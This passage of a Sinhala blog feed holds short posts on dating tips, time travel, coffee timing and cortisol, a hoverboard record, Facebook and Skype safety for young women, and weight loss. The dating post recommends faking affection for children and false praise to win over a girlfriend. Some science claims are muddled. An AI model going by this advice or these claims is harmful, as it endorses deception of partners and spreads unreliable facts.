මේක හොදින් තේරුම් ගැනීම වැදගත්.යාලුවෝ ආශ්‍රය කරනවට ගැනු අය අකමැති කියන කතාව බොරුවක්.ගැනු අය කැමතියි තමුන්ගේ සහකරුවා පොඩ්ඩක් යාලුවෝ එක්ක fun එකේ ඉන්නවට.ඉදලා හිටලාපොඩ්ඩක් set වෙලා සින්දුවක් කියලා සතුටින් ඉන්නවට.හැබැයි ඕනෙවට වඩා නම් මේ දේවල් කරන්න ගියොත් නම් බඩුම තමා.නොකර හිටියත් පොඩ්ඩක් අවුල්.සමාජය තුල මොන තරම් සිමා තිබුනත් ඇත්ත කතාව මේක තමයි.



තව පොඩි පොඩි දේවල් තියෙනවා.කමක් නෑ.ප්‍රධානම දේවල් 5ක් තමයි මේ තියෙන්නේ.හරි එහෙනම් මේ දේවල් වලට අවධානය දීලා ටික දවසක් තමුන්ගේ සහකාරියව test කරලා බලන්නකෝ.ඔයාට ලකුණු ලැබේවි බලන් ඉන්දැද්දී.එහෙනම් විශ්ම ලෝකය කැපෙන්න හදන්නේ.සුබ දවසක් ඔයාලට.

ලිපිය හොදනම් යාළුවොන්ටත් බලන්න share පාරක් දාලාම යන්න හොද ඩලාලා වගේ.

6:52 PM


බ්‍රිතාන්‍ය ජාතික ලේඛක H.G. Wells විසින් 1895දී රචනා කරන ලද කාල තරණය තේමා කොටගත් විද්‍යා ප්‍රබන්ධ නවකතාවක් වන "The Time Machine" ප්‍රකාශයට පත් වීමත් සමගම මිනිසාට කාලය හරහා අතීතයට හෝ අනාගතයට ගමන් කල හැකිදැයි යන්න ගැන බොහෝ දෙනාගේ අවධානය යොමු වන්නට පටන් ගත්තා. මෙසේ ඇරඹුණු කාල තරණ සංකල්පය පසුගිය සියවසේදී වැඩි වශයෙන්ම කතාබහට ලක්වූ මාතෘකා වලින් එකක්.



1905 වර්ශයේදී ඇල්බට් අයින්ස්ටයින් ඔහුගේ සාපේක්ෂතාවාදය පිළිබඳ විශේෂිත මූලධර්මය ඉදිරිපත් කරමින් කාලය හා අවකාශය සෑමවිටම එකිනෙක බැඳී පවතින බවත් අවකාශයෙන් තොරව කාලයත්, කාලයෙන් තොරව අවකාශයත් පැවතිය නොහැකි බවට ප්‍රකාශ කලා. අයින්ස්ටයින්ගේ අවකාශ-කාල සංකල්පයට අනුව අවකාශයේ මාන හතරක් ගැන සඳහන් වේ. දිග, පළල සහ උස ප්‍රථම මාන තුන වන අතර කාලය සිව්වන මානයයි. මෙයින් ප්‍රථම මාන තුන හරහාම අපට උවමනා ආකාරයට ගමන් කලහැකි අතර සිව්වන මානය වන කාලය හරහා අපට උවමනා ආකාරයට ගමන් කල නොහැක (අද වන තෙක්). (කාල තරණය අප සියලු දෙනාම අත් දකිනා නොවැළැක්විය හැකි ක්‍රියාවකි. අපි සෑම විටම කාලය නම් මානය හරහා පැයකට එක් පැයක වේගයකින් ගමන් කරමින් සිටින්නෙමු. නමුත් සාමාන්‍යයෙන් කාල තරණය යනුවෙන් හඳුන්වන්නේ මෙම වේගයට වඩා වෙනස් වූ වේගයකින් කාලය හරහා ගමන් කිරීමයි.) අධික වේගයකින් (ආලෝකයේ වේගයට ඉතා ආසන්න හෝ ආලෝකය වේගය ඉක්මවා ගිය වේගයක්) ගමන් කරනා රාමුවකදී කාලය ගතවීමේ වේගය පෘථිවියේදී කාලය ගතවීමේ වේගයට වඩා අඩු බව අයින්ස්ටයින් සඳහන් කර ඇත.මෙහිදී පෘථිවිය අධික වේගයෙන් ගමන් ගන්නා රාමුවට සාපේක්ශව නිශ්චල රාමුවක් ලෙස සලකනු ලැබේ.එනම් ආලෝකයේ වේගයෙන් (තත්පරයට කිලෝමීටර් 300,000ක්) ගමන් කිරීමෙන් අපට අනාගතයට ගමන් කල හැක. නමුත් රාමු දෙකේ සිටින කිසිවෙකුටත් කාලය ගතවීමේ වෙනසක් දැනෙන්නේ නැත.

ඔබ වයස අවුරුදු 20දී ආලෝකයේ වේගය මෙන් 99.5% වේගයකින් ගමන් කරන අභ්‍යවකාශ යානයක ගමන් ආරම්භ කලේ යයි සිතන්න. අභ්‍යවකාශ යානයේ ඇති ඔරලෝසුවක් භාවිතයෙන් කාලය මනිනා ඔබ හරියටම වසර 5කට පසුව නැවතත් පෘථිවියට පැමිණේ. එවිට ඔබගේ වයස අවුරුදු 25ක් වන අතර ඔබ ගමන් ආරම්භ කරන විට ඔබගේ සම වයසේ සිටියෙකු ඔබ නැවත පැමිණෙන විට වයස්ගත පුද්ගලයෙකු බවට පත්ව ඇති ආකාරය ඔබට දැකගත හැකිවනු ඇත. (නැතහොත් ඔවුන් මියගොස් පරම්පරා ගණනක් ගතවී තිබෙන්නටද පුලුවන.) එනම් ඔබ අභ්‍යවකාශ යානය හරහා පෘථිවියේ අනාගතයට ගමන් කර ඇත.



නමුත් මෙවැනි වේගයක් ප්‍රායෝගිකව තවමත් ළඟාකරගෙන නැත. නමුත් සෛද්ධාන්තිකව මෙම තත්වය පිළිගෙන ඇත. කෙසේ වෙතත් අයින්ස්ටයින් විසින් ඉදිරිපත් කල සාපේක්ෂතාවාදයේ එන තවත් සංකල්පයක් වෙයි. එනම් කිසිම විශ්වීය වස්තුවකට ආලෝකයේ වේගය ඉක්මවා යා නොහැකි බවයි. එනම් අප ආලෝකයේ වේගයට ඉතා ආසන්න වේගයක් ළඟාකරගත්තද අපට අනාගතයට ගමන් කලහැකි වන්නේ එක්තරා කාලසීමාවක් දක්වා පමණි. අපට අනාගතයට ගමන් කිරීමේ ශක්‍යතාවයක් (හැකියාවක්) ඇත. නමුත් අතීතයට ගමන් කිරීම සම්බන්ධව ගැටලුකාරී තත්වයක් ඇත.

බොහෝ දුරට අතීතයට ගමන් කිරීම කල නොහැක්කක් තරම් වන තත්වයකි ඇත්තේ. කළු කුහර හරහා අතීතයට යා හැකි බවට මතයක් පවතී. කළු කුහර අවකාශ-කාල තත්ව දෙකක් සම්බන්ධ කරන උමං මාර්ග ලෙස ක්‍රියාකරන බවට මතයක් ඇත. නමුත් මේවා තවමත් ඇත්තේ සංකල්ප තත්වයේය. මෙම මතවාද නිවැරදි බවට පිළිගත හැකි සාක්ෂි තවමත් ඉදිරිපත් වී නොමැත.

විද්‍යාවේ දියුණුවත් සමග ආලෝකයේ වේගයට ආසන්න වේගයෙන් ගමන් කල හැකි අභ්‍යවකාශ යානයක් නිපදවුවත් එහි ගමන් කිරීමට කෙනෙකු ඉදිරිපත් වීමට තීරණය කරයි නම් ඔහුට ඒ තීරණය අතිශය අපහසු තීරණයක් වනු ඇත. මන්දයත් මෙම මූලධර්මයට අනුව කාලයේ ආපසු ගමන් කිරීම සිදු කල නොහැක්කක් බැවිනි. එනම් අනාගතයට ගමන් කරනා කෙනෙකුට ආපසු ඒමක් නැත. අනාගතයේ ඇත්තේ කුමන ආකාරයේ තත්වයක් වුවත් එය පිළිගැනීමට ඔහුට සිදු වෙනවා ඇත.


6:46 PM

ඉතින් කොහොමද යාලුවනේ !!! අද කියන්න යන්නේ කෙල්ලෝ තමුන්ගේ කොල්ලා කරනවට ආසා දෙවල්  ටිකක්. 

හොදින් අදිනවට 
සාමාන්‍යයෙන් අපි කෙල්ලෙක් එක්ක යාලු වෙන්න try කරන කාලේ නම් අපිට තියෙන සුපිරිම kit ටිකනේ බස්සන්නේ. තව යාළුවොන්ගේ හොද ඇදුම් උනත් අරන් ඇවිත්  අදිනවනේ .එත් කෙල්ලව කොහොමහරි දාගත්තාට පස්සේ අපි ඒ තරම් අපේ ඇදුම් ගැන සැලකිලි මත්  වෙන්නේ නෑ. ඊට පස්සේ ආයෙමත් රබර් සෙරෙප්පු දෙකයි හඩු ඩෙනිමයි තමයි .එත් ඔයා දන්නවාද ? කෙල්ලෝ මාරම ආසයි තමුන්ගේ කොල්ලා හැමදාම ගොඩක් ලස්සනට  හා  පිළිවෙලකට ඇදුම් අදිනවට. ඔබට සල්ලි තියෙනවා නම් ගණන් වැඩි ඇදුම් අදිනවා නම් ඇය ගොඩක් කැමතියි. කෙල්ල හම්බවෙන්න යන හැම වෙලාවකම කෙල්ලෝ මුලින්ම බලලා comments දෙන්නේ අපේ ඇදුම් වලට.

පොඩියට හරි ටිකක් මෘදු පුද්ගලයෙක් වෙනවට 
මේකෙන් අදහස් වෙන්නේ නෑ ඔයා නිකන් ලාමක dial එකක් වෙන්න ඕනේ කියලා . එත් කෙල්ලෝ  කැමතියි තමුන් ආදරේ කරන කොල්ලාගේ ටිකක් මෘදු side එකකුත් තියෙනවට. එක කෙල්ලට පෙන්නන්න කරන්න තියෙන්නේ බොහොම පොඩි දෙයයි. ඇයට පෙන්නන්න ඔයා ටිකක් විතර  පුසොන්ට ආස බව , පොඩි බබාලා දැක්කම ටිකක් අරන් හුරතල් කරන්න. ඇයට පෙන්නන්න ඔබ පොඩි ළමයින් ට ගොඩක් කැමතියි කියලා. පොඩි ලමයි අල්ලාගෙන සමහර අය මුළු රටක්ම රවටපු එකේ මේ අපේ හොටු කෙල්ලෙක් පොඩ්ඩක් රවට්ටන්න බැරි නම් වැඩක්  නැනේ.


හොද Perfume එකක් 
මේකත් ගොඩක් වැදගත් දෙයක් . කොල්ලෝ නිතරම් ලග තියා ගන්න ඕනේ සුපිරිම සෙන්ට් එකක්. එක ආයේ ලොවෙත් නැති සෙන්ට් එකක් වෙන්න ඕනේ ඔබේ කෙල්ලට ඔබව නිතර නිතර මතක් වෙන. කෙල්ලෝ ආසයි එහෙම සෙන්ට් එකක් ඔයා පාවිච්චි කරනවා නම්

ඇයගේ ආරක්ෂාව ගැන  නිරන්තර සැලකිල්ලකින් ඉන්නවාට 
ඔබ ඔබේ කෙල්ල එක්ක පාරේ යනකොට නිතරම ඇයගේ ආරක්ෂාව ගැන හිතන බව පෙන්වන්න. නිතරම ඇය පාරේ අයිනට කර ගෙන බොහොම පරිස්සමින් ඇයව එක්කන් යනවට කෙල්ලෝ ගොඩක් කැමති. ඒ වගේම bus එකේ හිට ගෙන යනකොට ඇයගේ ආරක්ෂාව සදහා ඉන වටේ අත දාගෙන ඉන්නවා නම් , සෙනගක් මැද්දෙන් අරන් යනකොට ඇගේ අතින් හොදින් අල්ලාගෙන ඔබ ඉදිරියෙන් පාර හදාගෙන ඇයව එක්කන් යනවා නම් ඇය ගොඩක් සතුටු වෙනවා.

ඇය දිහා හොරෙන් අමුතු විදියට කන්න වගේ බලනවට 
ඔව් හැම කෙල්ලෙක්ම කැමතියි තමුන්ගේ ලස්සන පෙන්නලා කොල්ලව පිස්සු වට්ටන්න.එකනේ කෙල්ලෝ නිතරම තමුන්ගේ හැඩරුව ගැන මාර විදියට හිතන්නේ. වියදම් කරන්නේ. එක නිසා ගොඩක් කෙල්ලෝ කැමතියි තමුන්ගේ කොල්ල එක්ක ඉන්න වෙලාවට කොල්ල නිකන් එයා දිහා වශී වෙලා වගේ බලන් ඉන්නවට. කොටින්ම කිව්වොත් හොරෙන් අමුතු විදියට කන්න වගේ බලන් ඉන්නවට මොනවා හරි ඕනේ වෙලා වගේ. එතකොට කෙල්ලොන්ට එනවා මාර fit එකක් එයාලගේ හැඩරුව ගැන. ඒ ගැන හිතලා කෙල්ලෝ ගොඩක් සතුටු වෙනවා. ඔයාටත් ගොඩක් ලකුණු ලැබෙනවා .

ඇයව නිතරම වර්ණනා කරනවා නම් 
මේ ගැන ඉතින් අමුතුවෙන් කොල්ලොන්ට කියලා දෙන්න ඕනේ නැනේ. කෙල්ලෝ කියන්නේ  ලොකු වෙලත් බොරු  tediyo බදා ගෙන නිදියන ජාතියක් . එක නිසා තමුන්ගේ කෙල්ල කරන හැම දෙයකටම  විහිලු කරන එක නවත්තලා බොරුවට හරි ඇයගේ ඇදුම් , makeup හා අනිත් ඇය ගොඩක් මහන්සි වෙන දේවල් අගය කරන්න පටන් ගන්න.

ඔබ නිර්මාණශීලි අයෙක් නම් කෙල්ලෝ ගොඩක් කැමතියි 
ඔබට චිත්‍ර අදින්න පුළුවන් නම් , සින්දු කියන්න/ ලියන්න පුළුවන් නම් , සංගීත භාණ්ඩ වාදනය කරන්න පුළුවන් නම් , මොනවා හරි නිර්මාණශීලි හැකියාවක් තියෙනවා නම් කෙල්ලෝ මාරම කැමති.ඒ දේවල් යොදා ගෙන ඒ ගොල්ලෝ වෙනුවෙන් මොනවහරි වටිනා නිර්මානයක් කරලා දෙන්න පුලුවන් නම්  කෙල්ලෝ මුළු ජිවිත කාලෙම උනත් ඔයාට ආදරේ කරයි

ඔබට ආකර්ශනිය සිනහවක් තියෙනවා නම් 
ඇත්තටම මෙතැනදී අවශ්‍ය වෙන්නේ ඔබ හොදින් සිනාසීමයි. මුන බුම්මං ඉන්න අඩුවෙන් හිනාවෙන කොල්ලොන්ට ටිකක් විතර කෙල්ලොන්ගෙන් ලකුණු ලැබෙනවා අඩුයි

ඔබ තුවාය පමණක් ඇදගෙන බාත්රූම් එකෙන් එලියට එන සැම අවස්තාවකට ඇය ගොඩක් කැමතියි

ඒ වගේම ඔබ  ශිප් එක විතරක් යන්තම් වහපු බොත්තම හරියට දාපු නැති කොට කලිසමක් විතරක්  ඇදගෙන උදේට  දත් මදිනවා , ගෙදර එහෙට මෙහට ඇවිදිනවා හොරෙන් බලන්නත් කෙල්ලෝ ගොඩක් ආසයි

මේ අන්තිමට කියපු දෙක නම් අදාල වෙන්නේ marry කරපු කට්ටිය හොදේ.

6:30 AM

මේ ප්‍රශ්නයට උත්තරය බොහෝ දෙනෙක් නොදන්නා බවට කිසි සැකයක් නෑ. උදෑසනින් අවදිවන ඔබට උණුසුම් කෝපි කෝප්පයක් නැතුවම බැරි හැඟීමක් දැනෙන්නට පුළුවන්. නමුත් ඔබට ඔබේ කෝපි කෝප්පයෙන් ලැබෙන උපරිම ජවය ලබාගැනීමට නම් පෙනෙනවාට වඩා යමක් එහි සිදුවන බව දැනගැනීම වටිනවා. අපේ ශරීරය ස්වභාවයෙන්ම නිර්මාණය වී ඇත්තේ අපගේ එදිනෙදා ජීවිතය ගතකිරීමට අවශ්‍යවන ආකාරයටයි. ජෛව ඝටිකාවක් එහෙම නැත්තන් biological clock එකක් මගින් අපේ ශරීරයේ කටයුතු පාලනය කෙරෙනවා. මෙමගින් අපි නිදාගන්න කාලය සහ අවදියෙන් සිටින කාලය සම්බන්ධයෙන් කටයුතු පාලනය කෙරෙනවා.මේ කටයුතු ඉටුකිරීමට අවශ්‍ය දායකත්වය ලබා දෙනු ලබන්නේ කෝටිසෝල් නමැති හෝර්මෝනය මගිනි. අප සාමාන්‍යයෙන් අවදි වන අවස්ථාවේ මේ කෝටිසෝල් මට්ටම ඉහල අගයක පවතී. සාමානයෙන් උදෑසන 8 – 9 කාලය අතර මේ මට්ටම එහි මුදුන් අගයට පැමිණේ.
මෙවැනි අවස්ථාවක කැෆින් පානය කිරීම මගින් වන බලපෑම පහත විඩියෝවෙන් ඔබට දැකගැනීමට හැකිවේ. කෝටිසෝල් මට්ටම උපරිම අගයකට පැමිණෙන අවස්ථාවේ කැෆින් ශරීරගත වීම නිසා කැෆින් මගින් ඇති කෙරෙන බලපෑම උදාසීන වී යන අතරම ශරීරය තුල කෆින් වලට එරෙහි ප්‍රතිරෝධයක් ද ගොඩනැගෙනු ඇත. මේ නිසා ඔබට අනාගතයේ අවදියෙන් සිටීමට අවශ්‍ය කැෆින් ප්‍රමාණය පෙර අවස්ථාවලට වඩා ඉහල අගයක් ගනු ඇත.
මේ නිසා ඔබේ ශරීරයේ කෝටිසෝල් මට්ටම් පහල යන අවස්ථාවල කෝපි පානය කිරීම මගින් ඔබේ කොපි කෝප්පයේ උපරිම ප්‍රයෝජනය ඔබට ලබාගැනීමට හැකිවනු ඇත. සාමාන්‍යයෙන් උදෑසන 8-9ත් අතර දහවල් 12-1ත් අතර සහ සවස් කාලයේ 5.30-6.30ත් අතර කාල වල cortisol මට්ටම ඉහල බව අනාවරණය කරගෙන තිබේ.
නමුත් ඔබ උදෑසනින්ම අවදි වන පුද්ගලයකු හෝ ප්‍රමාද වී අවදි වන පුද්ගලයකු නම් ? මේ පිළිබඳව ඔබට වීඩියෝ පටය නැරඹීමෙන් දැන ගැනීමට පුළුවන්. ඔබ කුමන වෙලාවක අවදි වූවත් ඔබ අවදි වන මොහොතේ කෝටිසෝල් මට්ටම 50%කින් පමණ ඉහල ගොස් තිබේ. එම නිසා අවදි වී පැයක් පමණ නික්ම යන මොහොතේ කෝපි කෝප්පයක රස බැලීමෙන් ඔබට දවසේ ඉතිරි කාලය ප්‍රබෝධමත්ව ගතකිරීමට හැකිවනු ඇත.

6:26 AM

කැනේඩියානු ජාතික නිර්මාණකරුවකු කැනේඩියානු විලක් උඩින් මීටර 300ක් දුර අහසින් ගමන් කරමින් නව ගිනස් වාර්තාවක් පිහිටුවීමට සමත්වී තිබෙනවා. මෙහි ඇති විශේෂත්වය වන්නේ මේ සඳහා ඔහු යොදාගත් hoverboard (හුවර්බෝර්ඩ් එක) එහෙම නැත්තන් වායු පා යානය ඔහු විසින්ම නිර්මාණය කරගත් එකක් වීමයි.
මෙහි නිර්මාණකරු වන Catalin Alexandru Duru ගිනස් වාර්තා කණ්ඩායමට ප්‍රකාශ කර සිටියේ මෙය ඕනෑම මතුපිටක් මත සාර්ථකව ක්‍රියාකරන බවයි. ඔහු මෙය ජලය මතුපිට අත්හදා බලා ඇත්තේ වෙනත් මතුපිටක් යොදාගතහොත් යානය ඉතා ඉහල යාමට ඉඩ ඇති බැවිනි.
මෙය පසු ගිය සතියේ මාධ්‍යට නිකුත් කෙරුණු නමුත් මේ වාර්තාව තබන ලද්දේ 2014 අගෝස්තු 24වන දායි. අවසානාවකට මෙන් මෙය ක්‍රියාකරන ආකාරය පිළිබඳව එතරම් තොරතුරු නොමැති අතර මෙය අවර පෙති ආශ්‍රිතව ලබාගන්නා බලයකින් ( propeller-based system ) ක්‍රියාකරන බවට සැලකිය හැක.
මෙය අනෙක් අවස්ථාවලට වඩා විශේෂ වන්නේ අන් අවස්ථා වලදී මෙන් කාන්දම් බල හෝ ජලය භාවිතා නොකිරීමයි. මෙය වෙළඳපොළට මුදා හැරීමේ අදහසක් පිළිබඳව දැනගැනීමට නොලැබුනත් මේ පිළිබඳව ඇති දැඩි උනන්දුව හා කැමැත්ත නිසාම මෙය වෙළඳ භාණ්ඩයක් ලෙසට පැමිණෙතැයි අපේක්ෂා කිරීමට පුළුවන්.
මෙමගින් මීටර 5ක් උසින් මීටර 275.9ක දුරක් ගමන් කිරීමට හැකි විය. නමුත් මේ වාර්තාව තැබීමට ඔහුට ගමන් කිරීමට අවශ්‍ය වී තිබුනේ මීටර 50ක දුරක් පමණයි.

7:02 PM
ප පසු කරමින් සිටින්නේ ඉතිහාසයේ කවරදාකවත් නොවූ විරු තරම් වේගයකින් ලෝකයේ තාක්ෂණ මෙවලම් හා සන්නිවේදන හැකියාවන් දියුණු වන යුගයකයි.අද වන විට අන්තර්ජාලය හරහා ඉතා අඩු මුදලක් වැය කර ලෝකයේ ඕනෙම අයෙක් හා මුහුණට මුහුණ බලාගෙන කතා කිරීමට ගත වෙන්නේ තත්පර කිහිපයකි. සමාජ සම්බන්ධතා ජාල හා Video chat පහසු කම් සපයන skype වැනි මෘදුකාංග මගින් මානව සමාජයට සබදතා පැවැත්වීම සදහා ලබා දී ඇති පහසුව කියා නිම කල නොහැක.නමුත් අවාසනාවට කරුණ වන්නේ  තාක්ෂණ දියුණුවේ වේගයටත් වඩා වැඩි වේගයකින් අනිත් පැත්තෙන් සැම රටකම පාහේ සමාජ සංස්කෘතින් වල පල්ලට යාමයි.මිනිසුන් මෙම නවීන තාක්ෂනයන්ගෙන් නිසි ප්‍රයෝජන ගන්නවා වෙනුවට අද සිදු කරන්නේ වෙනත් දෙයක් වීම ඇත්තටම කණගාටුවට කරුණක්.



facebook හා skype වැනි සමාජ සම්බන්ධතා ජාල ඔස්සේ අපේ ජිවිත වලින් ඇත් වූ පැරණි යහළුවන් සමග සම්බන්දතා පවත්වා ගැනීමට හැකි වී තිබෙනවා.ඒ වගේම දැන් ඉන්න යාලුවෝ එක්ක නිරන්තර සම්බන්ධතා තියා ගන්න පුළුවන්.හැබැයි මේ වෙබ් අඩවි හා මෘදුකාංග තුලින් ඔබ අනාරක්ෂිත ප්‍රේම සම්බන්ධතා ඇති කර ගන්න ගීයොත් නම් එය ඔබේ මුළු ජිවිතයේම විනාශය වෙන්න පුළුවන් .විශේෂයන්ම මේ අවධානම ගැන තේරුම් ගත යුත්තේ අපේ කෙල්ලෝ තමයි.මොකද කොල්ලෝ නම් එක පාරක් නාවලා හවසට ගෙට ගන්න පුළුවන් .කිසි අව්ලක් නෑ.

කෙල්ලෝ කෝල්ලෝ අනිවා love කරන්න ඕනේ.නැත්තම් ඉතින් තරුන කාලෙන් වැඩක් නැති වෙනවානේ.එත් ඒ දේවල් කරන්න ඕනේ ආරක්ෂිත අකාරයකට.තරුණ අපි හැගීම් වලට නිදහසේ පියාබන්න දීල ජිවිතේ විදින්න ගියොත් ඔබ පමණක් නෙවෙයි ඔබේ පවුලේ ඔබේ ආදරනියන් පවා ගොඩක් දුක් වෙන දේවල් සිදු වෙන්න පුළුවන්.ඒ නිසා ප්‍රේම සම්බන්ධතා වලදී ඔබ  හොදින් මතක තියා ගන්න ඕනේ මේ ආරක්‍ෂිත කියන වචනය.කෙල්ලෝ විශේෂයෙන්ම.

ඉස්සර කෙල්ලෙක් set කර ගන්න කොල්ලෝ ගොඩක් කටු කැවා.මොකද facebook තිබුනේ නැනේ.එත් අද නවීන තාක්ෂනය එක්ක facebook කියන්නේ තරුණ කොල්ලෝ කෙල්ලොන්ට ගොඩක් ඉක්මණින් ලං වෙන්න පුළුවන් තැනක්.එකේ නරකකුත් නෑ.හැබැයි ඉතින් හොදින් පරිස්සම් වෙලා තමන්ගේ ජීවිතේට ලං කර ගත යුතු කට්ටිය විතරක් ලං කර ගන්න වග බලා ගන්න ඕනේ .මොකද ගොඩක් කොල්ලෝ කෙල්ලෝ  facebook chat  කරලා  ලං උනාට පස්සේ ඊළගට යන්නේ skype නැත්තම් FB video Call.ඔන්න ඔතනදි තමයි ප්‍රශ්නේ පටන් ගන්නේ.

ඔයා කෙල්ලෙක් නම් මෙන්න මේ දෙවල් හොදින් මතකයේ තියා ගන්න.ඔයාගේ  facebook එකට add කර ගත යුත්තේ ඔබේ යහළුවන් පමණයි.ඔබ දන්නා පුද්ගලයින් පමණයි.අඩුම ගන්නේ සැබෑ ජීවිතයේදී එක වරක් හෝ හමු වී ඇති පුද්ගලයින් පමණයි.ඔයාට දවසකට එන සේරම FB requests accept කරන්න යන්න එපා.

ඔබ FB එකට වැදගත් සංවර  profile picture එකක් දාන්න.මොකද ඔයා දාලා තියෙන Proifle picture එකේ ස්භාවය අනුව තමයි FB එකේදී ඔයාගේ චරිතය මිනිස්සු මනින්නේ, ඔයා මොන වගේ කෙනෙක් ද කියලා එයාලාගේ හිත් වලින් වර්ග කරන්නේ .ඒ වර්ග කිරීමට අනුව තමයි ඔබේ FB profile එකට එන msg ප්‍රමාණය හා Requsets ප්‍රමාණය තිරණය වෙන්නේ.

talk කරාම talk වෙන කෙල්ලේක් නම් වෙන්න එපා.මෙන්න මේ දේ ගොඩක් වැදගත්.කොල්ලෝ කෙල්ලෝ ආදරය කරන්න ඕනේ.නමුත් නිවැරදි විදියට.ලස්සන විදියට.නැතුව හැගීම් වලට වහල් වෙලා රාග සිතුවිලි වලින් හිත් පුරවාගෙන නෙවෙයි.ඒ නිසා ඔයා කෙල්ලෙක් නම් අනිවා මේ දේ හොදින් හිතේ තියා ගන්න.එන එන හැම hi එකටම hi ගාගෙන dear dear කියා ගෙන chat කරන්න ගියොත් නම් ඔයාගේ චරිතයට ඉක්මනටම සමාජයෙන් කළු පැල්ලමක් / නරක නාමයක් ඒකතු වේවි.කොල්ලෝ කොහොමත් කැමති වැදගත් කෙල්ලෝන්ට.හොද චරිතයක් තියෙන කෙල්ලොන්ට.talk කර ගමන් talk වෙන කෙල්ලො නිකන් fun එකක් විතරයි ගොඩක් කොල්ලොන්ට.මම මේ කෙල්ලොන්ට chat කරන්න එපා කියනවා නෙවෙයි.අනිවා chat කරන්න ඕනේ.නමුත් ඔබේ ගෞවරවය ආරක්ෂා කර ගෙන.වැදගත් කෙල්ලෙක් විදියට facebook එකේ ජිවත් වෙන්න අමතක කරන්න එපා.ඔබ එහෙම හිටියොත් ඕන තරම් කොල්ලෝ ඔබට පන දෙන්න උනත් ඉදිවී.ජිවිතයේ හරි වෙලාවට ඔවුන් ඔබගෙන් අදාරය ඉල්ලාවී.ඒ සුළු වෙලාවක ඔබේ සුවය ඉල්ලන්න නම් නෙවෙයි.ජිවිත කාලෙම ඔයා ලගින්ම තියා ගන්න.

skype වලින් ගොඩක් පරිස්සම් වෙන්න.කවදාවත් skype id එක නොදන්නා අයට දෙන්න එපා.අද වන කොට skype තරම් භයානක දෙයක් කෙල්ලොන්ට තවත් නෑ.skype වලින් ගත යුතු නිසි ප්‍රයෝජන ගන්න.නමුත් එක රාගයට මුල තැන දීලා ඔබේ ජීවිතය විනාශ කර ගන්න ජනෙලයක් කර ගන්න එපා.ඔබ ජිවිතේ කවදාවත් සැබෑ ලෙස හමු වී නැති කෙනෙක් ඔබට skype ඔස්සේ video chat කරන්න ආරාධනා කරොත් දෙපාරක් නෙවෙයි සිය පාරක් විතර හිතන්න.එහෙම කරන්න මොකක්ද හේතුව.Interview එකක් නම් කමක් නෑ.business වැඩක් නම් කමක් නෑ.හෙන fit යාලුවෙක් නම් කමක් නෑ.ඔබේ විශ්වාසවන්ත boy friend එක්ක නම් කමක් නෑ.ඒ ඇරෙන්න ඔබේ රාග සිතුවිලි වලට ඔබව පාලනය කරන්න දීලා webcam එක නම් open කරන්න එපා.

ඔයාලා දන්නවද skype video call record කරන්න පුළුවන් කියලා.අහිංසක කෙල්ලෝ රවට්ටලා ඔවුන්ව skype ඔස්සේ නිරුවත් කරලා ඒ video record කරලා website වලට ලොකු ලොකු ගණන් වලට විකුණන මහා ජාවාරම් දැන් අපේ රටෙත් තියෙනවා.එත් මේ දේවල් එලියට එනවා අඩුයි.එකට හේතුව තමයි සමාජ නින්දාව නිසා.මේ වගේ මෝඩ වැඩ නිසා අමාරුවේ වැටුනේ ගොඩක් කෙල්ලෝ ඒවා හිත් ඇතුලේ හංගන් ඉන්නවා.ඒ video අන්තරජාලයට මුදා හරිනවා කියා කියා හැමදාම ඒ කෙල්ලන්ව දුෂණය කරනවා.ඕකයි අද රටේ තත්වේ.සුළු මොහොතක සතුට ඔබේ මුළු ජිවිතයම විනාශ කරන්න පුළුවන්.ඔබේ පමණක් නෙවෙයි ඔබේ අම්ම තාත්තා සහෝදර සහෝදරියෝ හැම කෙනෙක් ගේම.

facebook එක කියන්නේ ඔයාගේ හැම දුකක්ම නොදන්න මිනිසුන්ට කියන තැනක් නෙවෙයි.දැනටමත් ආදර සම්බන්ධතා පවත්වා ගෙන යන කෙල්ලොන්ට හා විවාහක කාන්තාවන් මේ දේ හොදින් මතක තියා ගන්න.ඔබේ අදාර සම්බන්දාතාවයේ හෝ පවුල් ජිවිතේ අවුල් නිසා ඔබේ හිතේ තියෙන දුක facebook එක හරහා මහ විකාර status දාලා හරි photo දාලා හරි ලෝකෙට පෙන්නන්න යන්න එපා.ඔබ facebook එක හරහා කරන කියන දේවල් දිහා ඇස් ලක්ෂ ගානක් බලන් ඉන්නවා.ඔබට පුලුවන් ඔබේ මුළු චිත්ත සන්තානයම ඔයාගේ facebook wall ඒක තුලින් ලෝකයට පෙන්නන්න.ඒ වගේ විකාර දේවල් වලින් වෙන්නේ ඔයාගේ ප්‍රශ්න වලින් වෙන මිනිස්සුන්ට ප්‍රයෝජන ගන්න ආරාධනා කරන එක විතරයි.ඒ තුලින් ප්‍රශ්නේ තවත් අවුල් වෙනවා මිසක් විසදුමක් ලැබෙන්නේ නෑ.ඒ හින්දා වැඩිය දාන්නේ නැති අය එක්ක ඔයාගේ දුක chat කරන්න එපා.කොහෙත්ම කාටවත් කියන්න එපා හොදම යාලුවෙක්ට ඇරෙන්න.

 ආදරය කරන්න සතුටු වෙන්න සැබෑ ජීවිතේදී නිවරදි පුද්ගලයින් සමග නිවරැදී විදියට.ජිවත් වෙන්න වැදගත් කෙල්ලක් විදියට එතකොට මුළු සමාජයම ඔබට ගරු කරාවි ඔයා හොද උගත් වැදගත් තැන්පත් කෙල්ලෙක් කියලා.



ඔන්න ලිපිය ලියලා ඉවරයි.දැන් ඉතින් මට බනින කට්ටිය බනින්න.ලිපිය හොද නම් FB එඅක් පැත්තට share පාරකුත් දාලා යන්න.සුබ දවසක් ඔයාලට

9:45 AM

මහත අයට කෙට්ටු වෙන්නත් කෙට්ටු අයට මහත් වෙන්නත් තියන අවෂ්‍යතාවය මොනවගේද කියලා ආයෙත් අමුතුවෙන් පැහැදිලි කරන්න ඕනේ නෑනේ. මිනිස්සුන්ට තියන ලොකුම ප්‍රෂ්න වලින් එකක් නේ මේක. මහත් වෙන්නත් කෙට්ටු වෙන්නත් නොයෙක් ඖෂධ බටහිර වෙදකමේ තිබුනනත් ඒවායින් ඇතිවෙන අතුරු ආභාධ එහෙමත් නැත්තන් සයිඩ් ඉෆෙක්ට්ස් හරිම 

